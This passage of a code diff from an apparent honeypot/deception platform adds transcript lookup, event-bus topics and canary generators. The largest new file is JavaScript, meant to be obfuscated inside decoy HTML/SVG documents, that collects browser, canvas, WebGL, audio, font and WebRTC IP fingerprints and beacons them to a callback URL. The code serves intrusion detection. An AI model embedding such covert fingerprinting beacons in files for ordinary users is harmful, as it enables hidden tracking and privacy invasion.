 Functions here speak in :class:`ValueError` — callers that want HTTP
 semantics translate at the boundary. The router wrappers keep their
 existing ``HTTPException`` behaviour for backwards compatibility.
 PII boundary unchanged: shards live on disk; this module returns
 :class:`pathlib.Path` pointers, never byte content. The ``_get_index``
 cache stores byte offsets only.
 """
 from __future__ import annotations
 import os
 import re
 from collections import OrderedDict
 from pathlib import Path
 ARTIFACTS_ROOT = Path(
    os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts"),
 )
 _DECKY_RE = re.compile(r"^[a-z0-9][a-z0-9-]{0,62}$")
 _SERVICE_RE = re.compile(r"^(ssh|telnet)$")
 _SHARD_BASENAME_RE = re.compile(r"^sessions-\d{4}-\d{2}-\d{2}\.jsonl$")
 _SID_LINE_RE = re.compile(rb'"sid"\s*:\s*"([a-f0-9-]{36})"')
 # (path, mtime_ns) → {sid: [(offset, length), ...]}
 _INDEX_CACHE: "OrderedDict[tuple[str, int], dict[str, list[tuple[int, int]]]]" = (
    OrderedDict()
 )
 _CACHE_MAX = 32
 def validate_names(decky: str, service: str) -> None:
    """Raise :class:`ValueError` if ``decky`` / ``service`` look forged."""
    if not _DECKY_RE.fullmatch(decky):
        raise ValueError(f"invalid decky name: {decky!r}")
    if not _SERVICE_RE.fullmatch(service):
        raise ValueError(f"invalid service: {service!r}")
 def resolve_shard(decky: str, service: str, shard_name: str) -> Path:
    """Resolve ``ARTIFACTS_ROOT/{decky}/{service}/transcripts/{shard_name}``
    with escape-attempt detection. Raises :class:`ValueError` on
    invalid inputs.
    """
    validate_names(decky, service)
    if not _SHARD_BASENAME_RE.fullmatch(shard_name):
        raise ValueError(f"invalid shard name: {shard_name!r}")
    root = ARTIFACTS_ROOT.resolve()
    candidate = (root / decky / service / "transcripts" / shard_name).resolve()
    if root not in candidate.parents and candidate != root:
        raise ValueError(f"path escapes artifacts root: {candidate}")
    return candidate
 def _build_index(path: Path) -> dict[str, list[tuple[int, int]]]:
    index: dict[str, list[tuple[int, int]]] = {}
    with path.open("rb") as f:
        offset = 0
        for line in f:
            length = len(line)
            m = _SID_LINE_RE.search(line)
            if m:
                sid = m.group(1).decode("ascii")
                index.setdefault(sid, []).append((offset, length))
            offset += length
    return index
 def get_index(path: Path) -> tuple[dict[str, list[tuple[int, int]]], int]:
    """Return ``(sid → [(offset, length), …], file_size)``.
    Cached by ``(path, mtime_ns)``; rebuilt when the shard changes.
    """
    st = path.stat()
    key = (str(path), st.st_mtime_ns)
    if key in _INDEX_CACHE:
        _INDEX_CACHE.move_to_end(key)
        return _INDEX_CACHE[key], st.st_size
    index = _build_index(path)
    _INDEX_CACHE[key] = index
    _INDEX_CACHE.move_to_end(key)
    while len(_INDEX_CACHE) > _CACHE_MAX:
        _INDEX_CACHE.popitem(last=False)
    return index, st.st_size
 def find_shard_with_sid(decky: str, service: str, sid: str) -> Path | None:
    """Scan every ``sessions-YYYY-MM-DD.jsonl`` under the decky's
    transcripts dir until one claims this ``sid``.
    Newest shards first — most lookups are for recent sessions. Caches
    the per-shard sid index, so repeated calls are ~free until the
    shard's mtime changes.
    Returns ``None`` when nothing claims the sid OR when the
    transcripts dir is missing / unreadable. Never raises on
    filesystem-level errors — callers treat ``None`` as "skip".
    """
    validate_names(decky, service)
    root = ARTIFACTS_ROOT.resolve()
    transcripts_dir = (root / decky / service / "transcripts").resolve()
    if root not in transcripts_dir.parents:
        return None
    try:
        if not transcripts_dir.is_dir():
            return None
        entries = list(transcripts_dir.iterdir())
    except (OSError, PermissionError):
        return None
    shards = sorted(
        (p for p in entries if _SHARD_BASENAME_RE.fullmatch(p.name)),
        reverse=True,
    )
    for shard in shards:
        try:
            index, _size = get_index(shard)
        except (OSError, PermissionError):
            continue
        if sid in index:
            return shard
    return None
--- a/decnet/asn/iptoasn/provider.py
+++ b/decnet/asn/iptoasn/provider.py
@@ -13,7 +13,7 @@ from typing import Sequence
 from decnet.asn.base import Provider
 from decnet.asn.iptoasn.fetch import IPTOASN_SOURCES, fetch_all
 from decnet.asn.iptoasn.parse import parse_file
-from decnet.asn.lookup import AsnLookup
+from decnet.asn.lookup import AsnLookup, Range
 from decnet.asn.paths import ensure_root
 logger = logging.getLogger("decnet.asn.iptoasn.provider")
@@ -54,7 +54,7 @@ class IptoasnProvider(Provider):
                    "asn.iptoasn: cache load failed, rebuilding: %s", exc
                )
-        ranges = []
+        ranges: list[Range] = []
        for path in self.data_paths():
            if not path.exists():
                continue
--- a/decnet/bus/factory.py
+++ b/decnet/bus/factory.py
@@ -76,7 +76,7 @@ def _maybe_wrap_telemetry(bus: BaseBus) -> BaseBus:
    up at all we no-op.
    """
    try:
-        from decnet.telemetry import wrap_repository  # type: ignore[attr-defined]
+        from decnet.telemetry import wrap_repository
    except ImportError:
        return bus
    try:
--- a/decnet/bus/publish.py
+++ b/decnet/bus/publish.py
@@ -58,7 +58,7 @@ def make_thread_safe_publisher(
    contract the rest of this module already upholds.
    """
    if bus is None:
-        return lambda _topic, _payload, _event_type="": None
+        return lambda _topic, _payload, _event_type="": None  # type: ignore[misc]
    def _publish(topic: str, payload: dict[str, Any], event_type: str = "") -> None:
        # Stream threads may keep draining after the bus owner closed it
--- a/decnet/bus/topics.py
+++ b/decnet/bus/topics.py
@@ -17,6 +17,7 @@ Token structure (NATS-style, dot-separated):
    attacker.scored
    attacker.session.started
    attacker.session.ended
    attacker.observation.{primitive}
    identity.formed
    identity.observation.linked
    identity.merged
@@ -28,12 +29,18 @@ Token structure (NATS-style, dot-separated):
    campaign.unmerged
    credential.captured
    credential.reuse.detected
    attribution.profile.state_changed
    attribution.profile.multi_actor_suspected
    canary.{token_id}.triggered
    canary.{token_id}.placed
    canary.{token_id}.revoked
    system.log
    system.bus.health
    system.{worker}.health
    email.received
    ttp.tagged
    ttp.rule.fired.{technique_id}
    ttp.rule.suppressed
 Wildcards (per :func:`decnet.bus.base.matches`):
@@ -52,8 +59,12 @@ IDENTITY = "identity"
 CAMPAIGN = "campaign"
 SYSTEM = "system"
 CREDENTIAL = "credential"
 ATTRIBUTION = "attribution"
 ORCHESTRATOR = "orchestrator"
 CANARY = "canary"
 SMTP = "smtp"
 EMAIL = "email"
 TTP = "ttp"
 # ─── Leaf event-type constants (the last segment of each topic) ──────────────
@@ -83,6 +94,19 @@ DECKY_MUTATE_REQUEST = "mutate_request"
 # syslog sidechannel too) to interleave substrate-change markers into
 # attacker traversals.
 DECKY_MUTATION = "mutation"
 # Per-service add/remove on a deployed decky (live; no full redeploy).
 # Payload carries ``decky_name``, ``service_name``, optional
 # ``topology_id``, and ``services`` (the post-mutation list).  Consumers
 # that watch substrate shape (correlator, dashboard, profiler) reconcile
 # off these without waiting for the next decnet-state.json snapshot.
 DECKY_SERVICE_ADDED = "service_added"
 DECKY_SERVICE_REMOVED = "service_removed"
 # Per-service config change (the schema-driven Inspector form).  Payload
 # carries ``decky_name``, ``service_name``, optional ``topology_id``,
 # ``service_config`` (the new validated dict), and ``recreated`` — true
 # when the operator hit Apply (container was force-recreated to pick up
 # the new env), false when they only hit Save (DB-only).
 DECKY_SERVICE_CONFIG_CHANGED = "service_config_changed"
 # Attacker event types (second token under the ``attacker`` root).  First
 # sighting, session boundary transitions, and score-threshold crossings
@@ -94,6 +118,14 @@ ATTACKER_SCORED = "scored"
 # Distinct from ``observed`` which is the correlator's first-sight signal —
 # a fingerprint is additional evidence about an already-observed attacker.
 ATTACKER_FINGERPRINTED = "fingerprinted"
 # Published when the prober observes a NEW hash for an
 # (attacker_ip, port, probe_type) triple it has seen before — i.e. the
 # attacker rotated their VPS, rebuilt their SSH server, swapped their
 # TLS cert.  Distinct from ``fingerprinted`` which fires on every probe
 # result; ``fingerprint_rotated`` fires only on diff and carries both
 # old_hash + new_hash.  Producer: prober (via the rotation library);
 # consumers: dashboard, forensics, attribution clustering.
 ATTACKER_FINGERPRINT_ROTATED = "fingerprint_rotated"
 ATTACKER_SESSION_STARTED = "session.started"
 ATTACKER_SESSION_ENDED = "session.ended"
 # Published by the ``decnet enrich`` worker after an enrichment pass
@@ -101,6 +133,19 @@ ATTACKER_SESSION_ENDED = "session.ended"
 # returned a verdict).  Payload carries the aggregate verdict + per-
 # provider summary so SIEM-bound webhooks don't need to re-query the DB.
 ATTACKER_INTEL_ENRICHED = "intel.enriched"
 # Per-primitive BEHAVE-SHELL observation. Full topic shape:
 #   attacker.observation.<primitive>
 # e.g. ``attacker.observation.motor.input_modality``.  Producer:
 # ``decnet/profiler/behave_shell/`` (extractor library called from the
 # profiler worker on ``attacker.session.ended``); consumers: dashboard
 # SSE relay, attribution engine state machine, federation gossip
 # (post-v0).  See development/BEHAVE-INTEGRATION.md §"Bus topics" for
 # the wire-format contract — the prefix is documentation + pattern
 # match only; bus auth is socket file perms (DEBT-029 §2), not
 # topic-level.  The ``primitive`` segment MAY contain dots
 # (``motor.shell_mastery.tab_completion``) — the same dotted-leaf
 # rule that ``attacker.session.ended`` uses.
 ATTACKER_OBSERVATION_PREFIX = "observation"
 # Identity-resolution event types (second/third tokens under ``identity``).
 # Published by the (future) clusterer worker — see
@@ -168,6 +213,42 @@ CAMPAIGN_UNMERGED = "unmerged"
 CREDENTIAL_CAPTURED = "captured"
 CREDENTIAL_REUSE_DETECTED = "reuse.detected"
 # Attribution-engine event types (second/third tokens under
 # ``attribution``).  Published by the v0 attribution worker
 # (``decnet.correlation.attribution_worker``) which subscribes to
 # ``attacker.observation.>`` and runs the per-(identity, primitive)
 # state machine.  See ``development/ATTRIBUTION-ENGINE.md``.
 #
 #   attribution.profile.state_changed         — per-primitive state
 #                                               transition (e.g.
 #                                               stable → drifting).
 #                                               Payload: identity_uuid,
 #                                               primitive, old_state,
 #                                               new_state, current_value,
 #                                               confidence,
 #                                               observation_count, ts.
 #   attribution.profile.multi_actor_suspected — fires when ≥ 2
 #                                               primitives flag the same
 #                                               identity as multi_actor
 #                                               concurrently. Cross-
 #                                               primitive correlator;
 #                                               single-primitive
 #                                               multi_actor is too noisy
 #                                               on its own. Payload:
 #                                               identity_uuid, primitives,
 #                                               evidence_summary,
 #                                               confidence, ts.
 #
 # These are *derived* signals — distinct from
 # ``identity.*`` (clusterer lifecycle, IDENTITY_RESOLUTION.md) and
 # ``attacker.observation.*`` (raw extractor envelopes,
 # BEHAVE-INTEGRATION.md). The three families compose: observations feed
 # the attribution engine, the engine emits derived state, the clusterer
 # reads observations + state to form / merge identities.
 ATTRIBUTION_PROFILE_PREFIX = "profile"
 ATTRIBUTION_PROFILE_STATE_CHANGED = "profile.state_changed"
 ATTRIBUTION_PROFILE_MULTI_ACTOR_SUSPECTED = "profile.multi_actor_suspected"
 # Canary-token event types (third token under ``canary``).
 #
 #   canary.{token_id}.placed     — orchestrator/API successfully planted a
@@ -231,6 +312,43 @@ WORKER_CONTROL_START = "start"
 # of patterns. Payload is currently empty; consumers only need the signal.
 WEBHOOK_SUBSCRIPTIONS_CHANGED = "system.webhook.subscriptions_changed"
 # Email-receipt event — fired by smtp / smtp-relay services on full-message
 # receipt (envelope + headers + body + attachments captured). Single-token
 # leaf so the bus tokenizer accepts it directly under the ``email`` root.
 # Consumed by the TTP ``email_lifter`` for header / body-pattern / attachment
 # rules. PII rule (TTP_TAGGING.md "Hard parts §6"): payload carries hashes,
 # counts, header names, and rcpt-domain sets — never rcpt addresses or body
 # bytes.
 EMAIL_RECEIVED = "received"
 # TTP-tagging event types (second/third tokens under ``ttp``).
 #
 #   ttp.tagged                     — one or more new tags written. Published
 #                                    only when ``INSERT OR IGNORE`` wrote at
 #                                    least one new row; idempotent
 #                                    re-evaluations publish nothing
 #                                    (loop-prevention invariant — see
 #                                    TTP_TAGGING.md).
 #   ttp.rule.fired.{technique_id}  — per-technique fan-out for SIEM
 #                                    consumers that subscribe to a single
 #                                    technique. Topic key is the parent
 #                                    technique; sub_technique is in the
 #                                    payload. Built via :func:`ttp_rule_fired`.
 #   ttp.rule.suppressed            — rule fired but the tag was dropped
 #                                    (confidence below floor, rate-limited,
 #                                    or the rule's RuleState was disabled).
 #                                    Observability signal for the dashboard.
 #
 # Per-rule reload + state-change topics. Built via
 # :func:`ttp_rule_reloaded` / :func:`ttp_rule_state`; SIEM consumers
 # subscribe to ``ttp.rule.reloaded.>`` (every rule) or
 # ``ttp.rule.reloaded.R0001`` (one rule) at their preferred granularity.
 TTP_TAGGED = "tagged"
 TTP_RULE_FIRED = "rule.fired"
 TTP_RULE_SUPPRESSED = "rule.suppressed"
 TTP_RULE_RELOADED = "rule.reloaded"
 TTP_RULE_STATE = "rule.state"
 # ─── Builders ────────────────────────────────────────────────────────────────
@@ -301,6 +419,42 @@ def attacker(event_type: str) -> str:
    return f"{ATTACKER}.{event_type}"
 def attacker_observation(primitive: str) -> str:
    """Build ``attacker.observation.<primitive>``.
    *primitive* is the fully-qualified BEHAVE-SHELL primitive path
    (e.g. ``motor.input_modality``,
    ``cognitive.feedback_loop_engagement``,
    ``motor.shell_mastery.tab_completion``).  Dotted primitives are
    permitted — this matches the format
    ``behave_shell.spec.event_adapter.event_topic_for`` produces
    upstream, and DECNET's bus admits the dotted leaf the same way
    :func:`attacker` does for ``session.started``.
    Empty string is rejected so a downstream typo doesn't ship as
    ``attacker.observation.``.
    """
    if not primitive:
        raise ValueError(
            "attacker_observation topic requires a non-empty primitive",
        )
    return f"{ATTACKER}.{ATTACKER_OBSERVATION_PREFIX}.{primitive}"
 def attribution(event_type: str) -> str:
    """Build ``attribution.<event_type>``.
    *event_type* is typically one of
    :data:`ATTRIBUTION_PROFILE_STATE_CHANGED` or
    :data:`ATTRIBUTION_PROFILE_MULTI_ACTOR_SUSPECTED` — both contain a
    dot (``profile.state_changed``) which is permitted under the same
    "trailing dotted leaf" rule that ``attacker.session.started`` uses.
    """
    if not event_type:
        raise ValueError("attribution topic requires a non-empty event_type")
    return f"{ATTRIBUTION}.{event_type}"
 def campaign(event_type: str) -> str:
    """Build ``campaign.<event_type>``.
@@ -381,6 +535,86 @@ def system_control(worker: str) -> str:
    return f"{SYSTEM}.{worker}.{SYSTEM_CONTROL}"
 def smtp(event_type: str) -> str:
    """Build ``smtp.<event_type>``.
    *event_type* may contain dots (e.g. ``probe.pending``).
    """
    if not event_type:
        raise ValueError("smtp topic requires a non-empty event_type")
    return f"{SMTP}.{event_type}"
 def email_topic(event_type: str) -> str:
    """Build ``email.<event_type>``.
    Named ``email_topic`` rather than ``email`` to avoid shadowing the
    Python ``email`` stdlib package at import sites that pull both.
    *event_type* is typically :data:`EMAIL_RECEIVED`.
    """
    if not event_type:
        raise ValueError("email topic requires a non-empty event_type")
    return f"{EMAIL}.{event_type}"
 def ttp(event_type: str) -> str:
    """Build ``ttp.<event_type>``.
    *event_type* is typically one of :data:`TTP_TAGGED`,
    :data:`TTP_RULE_FIRED`, or :data:`TTP_RULE_SUPPRESSED`. Dotted
    leaves (``rule.fired``) are permitted — same rationale as
    :func:`system`. For per-technique fan-out use
    :func:`ttp_rule_fired`.
    """
    if not event_type:
        raise ValueError("ttp topic requires a non-empty event_type")
    return f"{TTP}.{event_type}"
 def ttp_rule_fired(technique_id: str) -> str:
    """Build ``ttp.rule.fired.<technique_id>``.
    Per-technique fan-out: SIEM subscribers can listen on
    ``ttp.rule.fired.>`` for everything, ``ttp.rule.fired.T1110`` for
    one technique. *technique_id* is validated as a single segment —
    sub-techniques like ``T1110.001`` are rejected because they would
    split into two tokens. The topic key is the parent technique;
    ``sub_technique_id`` lives in the payload.
    """
    _reject_tokens(technique_id)
    return f"{TTP}.rule.fired.{technique_id}"
 def ttp_rule_reloaded(rule_id: str) -> str:
    """Build ``ttp.rule.reloaded.<rule_id>``.
    Per-rule fan-out fired by the :class:`~decnet.ttp.store.base.RuleStore`
    when a rule's *definition* changes (YAML edit on the filesystem
    backend, ``ttp_rule`` row update on the database backend). One event
    per per-rule edit — never batched (the "incremental, never batched"
    property in TTP_TAGGING.md §"Bus topics" inherits its granularity
    from :meth:`RuleStore.subscribe_changes`).
    Subscribers: ``ttp.rule.reloaded.>`` for every rule,
    ``ttp.rule.reloaded.R0001`` for one. *rule_id* is validated as a
    single segment.
    """
    _reject_tokens(rule_id)
    return f"{TTP}.{TTP_RULE_RELOADED}.{rule_id}"
 def ttp_rule_state(rule_id: str) -> str:
    """Build ``ttp.rule.state.<rule_id>``.
    Per-rule fan-out fired by the :class:`~decnet.ttp.store.base.RuleStore`
    when a rule's *operational state* changes (operator hits the disable
    button, an ``expires_at`` TTL fires and auto-reverts the state).
    *rule_id* is validated as a single segment.
    """
    _reject_tokens(rule_id)
    return f"{TTP}.{TTP_RULE_STATE}.{rule_id}"
 def _reject_tokens(*parts: str) -> None:
    """Reject topic segments that would break NATS-style tokenization.
--- a/decnet/canary/_obfuscate_helper.js
+++ b/decnet/canary/_obfuscate_helper.js
@@ -0,0 +1,18 @@
 // Node helper invoked by decnet.canary.obfuscator.
 // Reads {code, options} JSON from stdin, writes obfuscated JS to stdout.
 // Kept dependency-light on purpose: only javascript-obfuscator.
 const JsObf = require('javascript-obfuscator');
 let raw = '';
 process.stdin.setEncoding('utf8');
 process.stdin.on('data', (chunk) => { raw += chunk; });
 process.stdin.on('end', () => {
  try {
    const { code, options } = JSON.parse(raw);
    const result = JsObf.obfuscate(code, options || {});
    process.stdout.write(result.getObfuscatedCode());
  } catch (e) {
    process.stderr.write(String(e && e.stack || e));
    process.exit(2);
  }
 });
--- a/decnet/canary/base.py
+++ b/decnet/canary/base.py
@@ -100,6 +100,12 @@ class CanaryArtifact:
    planting.  Never leaked to the attacker-facing surface.
    """
    fingerprint_nonce: Optional[str] = None
    """Per-mint HMAC nonce for fingerprint canaries; ``None`` for everything
    else.  Cultivator reads this and persists it on ``CanaryToken.fingerprint_nonce``
    so the worker can validate incoming ``?k=`` params.
    """
 class CanaryGenerator(ABC):
    """Produces a fake artifact from scratch."""
--- a/decnet/canary/cultivator.py
+++ b/decnet/canary/cultivator.py
@@ -46,6 +46,8 @@ _CLASS_TO_GENERATOR: dict[ContentClass, str] = {
    ContentClass.CANARY_HONEYDOC_DOCX: "honeydoc_docx",
    ContentClass.CANARY_HONEYDOC_PDF: "honeydoc_pdf",
    ContentClass.CANARY_MYSQL_DUMP: "mysql_dump",
    ContentClass.CANARY_FINGERPRINT_HTML: "fingerprint_html",
    ContentClass.CANARY_FINGERPRINT_SVG: "fingerprint_svg",
 }
@@ -62,6 +64,8 @@ _GENERATOR_TO_KIND: dict[str, str] = {
    "honeydoc_pdf": "http",
    "ssh_key": "dns",             # trip is DNS resolution of host comment
    "mysql_dump": "dns",          # trip is DNS resolution of subdomain
    "fingerprint_html": "http",   # obfuscated JS beacons GET /c/<slug>
    "fingerprint_svg": "http",    # same, embedded inside SVG <script>
 }
@@ -78,6 +82,8 @@ _DEFAULT_PATH: dict[ContentClass, str] = {
    ContentClass.CANARY_HONEYDOC_DOCX: "/home/{persona}/Documents/Q3-Operations-Review.docx",
    ContentClass.CANARY_HONEYDOC_PDF: "/home/{persona}/Documents/Q3-Operations-Review.pdf",
    ContentClass.CANARY_MYSQL_DUMP: "/var/backups/db_backup.sql",
    ContentClass.CANARY_FINGERPRINT_HTML: "/home/{persona}/Documents/asset_directory.html",
    ContentClass.CANARY_FINGERPRINT_SVG: "/home/{persona}/Documents/network_topology.svg",
 }
@@ -136,10 +142,12 @@ async def cultivate(
        )
    callback_token = _new_callback_token()
    http_base_str: str = http_base or os.environ.get("DECNET_CANARY_HTTP_BASE") or ""
    dns_zone_str: str = dns_zone or os.environ.get("DECNET_CANARY_DNS_ZONE") or ""
    ctx = CanaryContext(
        callback_token=callback_token,
-        http_base=http_base or os.environ.get("DECNET_CANARY_HTTP_BASE", ""),
+        http_base=http_base_str,
-        dns_zone=dns_zone or os.environ.get("DECNET_CANARY_DNS_ZONE", ""),
+        dns_zone=dns_zone_str,
        persona="linux",  # all our deckies are POSIX in MVP
    )
    generator = get_generator(gen_name)
@@ -154,7 +162,7 @@ async def cultivate(
    # attribute a callback if the artifact trips during the plant
    # itself (improbable but possible — DOCX viewers can preview
    # autoplay-style).
-    await repo.create_canary_token({
+    token_data: dict = {
        "kind": _GENERATOR_TO_KIND.get(gen_name, "http"),
        "decky_name": plan.decky_name,
        "instrumenter": None,
@@ -165,7 +173,10 @@ async def cultivate(
        "placed_at": datetime.now(timezone.utc),
        "created_by": created_by,
        "state": "planted",
-    })
+    }
    if artifact.fingerprint_nonce is not None:
        token_data["fingerprint_nonce"] = artifact.fingerprint_nonce
    await repo.create_canary_token(token_data)
    # Carry the placement_path on the artifact so the orchestrator's
    # plant_file call uses it.  We don't mutate the generator's
--- a/decnet/canary/dns_server.py
+++ b/decnet/canary/dns_server.py
@@ -131,7 +131,7 @@ def _build_response(
    question = qname_bytes + struct.pack("!HH", query.qtype, query.qclass)
    answer = b""
-    if an_count:
+    if an_count and answer_ip is not None:
        # Use a name pointer back to the question (offset 12).
        ptr = struct.pack("!H", 0xC000 | 12)
        rdata = bytes(int(o) for o in answer_ip.split("."))
@@ -169,10 +169,10 @@ class CanaryDNSProtocol(asyncio.DatagramProtocol):
        self._answer_ip = answer_ip
        self._transport: Optional[asyncio.DatagramTransport] = None
-    def connection_made(self, transport) -> None:  # type: ignore[override]
+    def connection_made(self, transport) -> None:
-        self._transport = transport  # type: ignore[assignment]
+        self._transport = transport
-    def datagram_received(  # type: ignore[override]
+    def datagram_received(
        self, data: bytes, addr: Tuple[str, int],
    ) -> None:
        try:
@@ -190,7 +190,7 @@ class CanaryDNSProtocol(asyncio.DatagramProtocol):
            return
        # Known name — answer with our sinkhole IP, then fire the hook.
        self._send(addr, _build_response(query, answer_ip=self._answer_ip))
-        asyncio.create_task(self._hook(slug, query, addr[0]))
+        asyncio.ensure_future(self._hook(slug, query, addr[0]))
    def _slug_for(self, qname: str) -> Optional[str]:
        if not self._zone or not qname.endswith(self._suffix):
--- a/decnet/canary/factory.py
+++ b/decnet/canary/factory.py
@@ -21,6 +21,8 @@ KNOWN_GENERATORS: Tuple[str, ...] = (
    "honeydoc_docx",
    "honeydoc_pdf",
    "mysql_dump",
    "fingerprint_html",
    "fingerprint_svg",
 )
 KNOWN_INSTRUMENTERS: Tuple[str, ...] = (
@@ -64,6 +66,16 @@ def get_generator(name: str) -> CanaryGenerator:
    if name == "mysql_dump":
        from decnet.canary.generators.mysql_dump import MySQLDumpGenerator
        return MySQLDumpGenerator()
    if name == "fingerprint_html":
        from decnet.canary.generators.fingerprint_html import (
            FingerprintHtmlGenerator,
        )
        return FingerprintHtmlGenerator()
    if name == "fingerprint_svg":
        from decnet.canary.generators.fingerprint_svg import (
            FingerprintSvgGenerator,
        )
        return FingerprintSvgGenerator()
    raise ValueError(
        f"Unknown canary generator: {name!r}. Known: {KNOWN_GENERATORS}"
    )
--- a/decnet/canary/fingerprint_payload.js
+++ b/decnet/canary/fingerprint_payload.js
@@ -0,0 +1,291 @@
 // Canary fingerprint payload — the JS that runs inside an opened HTML/SVG
 // canary, harvests browser primitives, and beacons the result back to the
 // canary worker.  Ported from canary-self-test.html with the rendering UI
 // stripped out.
 //
 // Three placeholders are substituted by the Python builder BEFORE
 // javascript-obfuscator runs:
 //
 //   {{BEACON_URL}}  → full URL to /c/<callback_token> (no trailing slash)
 //   {{MINT_UUID}}   → per-mint UUID, baked into the string-array post-obf
 //   {{MINT_NONCE}}  → 16-hex HMAC nonce; the worker rejects ?d=/?o= without it
 //
 // Beacon strategy (MVP): a bare GET pixel for "I was opened" reliability,
 // then a fingerprint payload sent as a base64-URL query param on a second
 // GET so the existing worker records the hit even before step-4 POST
 // support lands.  Both fail-open: any error short-circuits to next step.
 (async function () {
  var BEACON_URL = "{{BEACON_URL}}";
  var MINT_UUID = "{{MINT_UUID}}";
  var MINT_NONCE = "{{MINT_NONCE}}";
  var fp = { mint: MINT_UUID };
  function fire(url) {
    try {
      var img = new Image();
      img.src = url;
    } catch (e) { /* swallow */ }
  }
  // 1) bare-open beacon — fires regardless of whether the rest succeeds
  fire(BEACON_URL + "?o=1&k=" + MINT_NONCE);
  function sha256(str) {
    var buf = new TextEncoder().encode(str);
    return crypto.subtle.digest("SHA-256", buf).then(function (h) {
      return Array.from(new Uint8Array(h))
        .map(function (b) { return b.toString(16).padStart(2, "0"); })
        .join("");
    });
  }
  // navigator
  try {
    fp.nav = {
      ua: navigator.userAgent,
      pl: navigator.platform,
      lg: navigator.language,
      lgs: (navigator.languages || []).join(","),
      ck: navigator.cookieEnabled,
      dnt: navigator.doNotTrack,
      hc: navigator.hardwareConcurrency,
      dm: navigator.deviceMemory || null,
      tp: navigator.maxTouchPoints,
      wd: navigator.webdriver === true,
      pdf: navigator.pdfViewerEnabled || null,
    };
  } catch (e) { fp.nav = { err: String(e) }; }
  // screen
  try {
    fp.scr = {
      w: screen.width, h: screen.height,
      aw: screen.availWidth, ah: screen.availHeight,
      cd: screen.colorDepth, pd: screen.pixelDepth,
      dpr: window.devicePixelRatio,
      iw: window.innerWidth, ih: window.innerHeight,
      or: (screen.orientation && screen.orientation.type) || null,
    };
  } catch (e) { fp.scr = { err: String(e) }; }
  // tz / locale
  try {
    var dtf = Intl.DateTimeFormat().resolvedOptions();
    fp.tz = {
      z: dtf.timeZone, lc: dtf.locale,
      ca: dtf.calendar, ns: dtf.numberingSystem,
      off: new Date().getTimezoneOffset(),
    };
  } catch (e) { fp.tz = { err: String(e) }; }
  // connection
  try {
    var c = navigator.connection;
    fp.cn = c ? {
      t: c.effectiveType, dl: c.downlink, rtt: c.rtt, sd: c.saveData,
    } : null;
  } catch (e) { fp.cn = { err: String(e) }; }
  // canvas
  try {
    var cv = document.createElement("canvas");
    cv.width = 280; cv.height = 60;
    var ctx = cv.getContext("2d");
    ctx.textBaseline = "top";
    ctx.font = "14px Arial";
    ctx.fillStyle = "#f60";
    ctx.fillRect(125, 1, 62, 20);
    ctx.fillStyle = "#069";
    ctx.fillText("c-" + String.fromCharCode(0x1f600), 2, 15);
    ctx.fillStyle = "rgba(102,204,0,0.7)";
    ctx.fillText("c-" + String.fromCharCode(0x1f600), 4, 17);
    var dataURL = cv.toDataURL();
    fp.cv = { h: await sha256(dataURL), n: dataURL.length };
  } catch (e) { fp.cv = { err: String(e) }; }
  // webgl
  try {
    var gc = document.createElement("canvas");
    var gl = gc.getContext("webgl") || gc.getContext("experimental-webgl");
    if (gl) {
      var ext = gl.getExtension("WEBGL_debug_renderer_info");
      fp.gl = {
        v: gl.getParameter(gl.VENDOR),
        r: gl.getParameter(gl.RENDERER),
        ver: gl.getParameter(gl.VERSION),
        sl: gl.getParameter(gl.SHADING_LANGUAGE_VERSION),
        uv: ext ? gl.getParameter(ext.UNMASKED_VENDOR_WEBGL) : null,
        ur: ext ? gl.getParameter(ext.UNMASKED_RENDERER_WEBGL) : null,
      };
    } else { fp.gl = { err: "unavailable" }; }
  } catch (e) { fp.gl = { err: String(e) }; }
  // audio
  try {
    var ACtx = window.OfflineAudioContext || window.webkitOfflineAudioContext;
    if (ACtx) {
      var actx = new ACtx(1, 44100, 44100);
      var osc = actx.createOscillator();
      var cmp = actx.createDynamicsCompressor();
      osc.type = "triangle"; osc.frequency.value = 10000;
      cmp.threshold.value = -50; cmp.knee.value = 40;
      cmp.ratio.value = 12; cmp.attack.value = 0; cmp.release.value = 0.25;
      osc.connect(cmp); cmp.connect(actx.destination);
      osc.start(0);
      var buf = await actx.startRendering();
      var data = buf.getChannelData(0).slice(4500, 5000);
      var sum = 0;
      for (var i = 0; i < data.length; i++) sum += Math.abs(data[i]);
      fp.au = { h: await sha256(sum.toString()), s: sum.toFixed(8) };
    } else { fp.au = { err: "unavailable" }; }
  } catch (e) { fp.au = { err: String(e) }; }
  // fonts
  try {
    var bases = ["monospace", "sans-serif", "serif"];
    var tests = [
      "Arial", "Helvetica", "Times New Roman", "Courier New", "Verdana",
      "Georgia", "Trebuchet MS", "Comic Sans MS", "Impact",
      "Calibri", "Cambria", "Consolas", "Segoe UI", "Tahoma",
      "JetBrains Mono", "Fira Code", "Cascadia Code", "SF Mono",
      "Menlo", "Monaco", "Source Code Pro", "Inconsolata", "Hack",
      "San Francisco", "Helvetica Neue", "Lucida Grande",
      "DejaVu Sans", "DejaVu Sans Mono", "Liberation Sans",
      "Liberation Mono", "Ubuntu", "Ubuntu Mono", "Roboto",
      "Noto Sans", "Noto Mono",
      "Microsoft YaHei", "SimSun", "PingFang SC", "Hiragino Sans",
      "Hiragino Kaku Gothic Pro", "Yu Gothic", "Meiryo",
      "Malgun Gothic", "Noto Sans CJK",
      "Adobe Garamond Pro", "Myriad Pro", "Minion Pro",
      "Bahnschrift", "Cyberpunk",
    ];
    var sp = document.createElement("span");
    sp.style.fontSize = "72px";
    sp.style.position = "absolute";
    sp.style.left = "-9999px";
    sp.innerHTML = "mmmmmmmmmmlli";
    document.body.appendChild(sp);
    var bs = {};
    for (var bi = 0; bi < bases.length; bi++) {
      sp.style.fontFamily = bases[bi];
      bs[bases[bi]] = { w: sp.offsetWidth, h: sp.offsetHeight };
    }
    var det = [];
    for (var ti = 0; ti < tests.length; ti++) {
      for (var bj = 0; bj < bases.length; bj++) {
        sp.style.fontFamily = "'" + tests[ti] + "'," + bases[bj];
        if (sp.offsetWidth !== bs[bases[bj]].w ||
            sp.offsetHeight !== bs[bases[bj]].h) {
          det.push(tests[ti]); break;
        }
      }
    }
    document.body.removeChild(sp);
    fp.ft = {
      h: await sha256(det.slice().sort().join(",")),
      n: det.length, t: tests.length, d: det,
    };
  } catch (e) { fp.ft = { err: String(e) }; }
  // webrtc local ip leak
  try {
    var ips = {}; var cands = [];
    var RPC = window.RTCPeerConnection || window.webkitRTCPeerConnection ||
              window.mozRTCPeerConnection;
    if (RPC) {
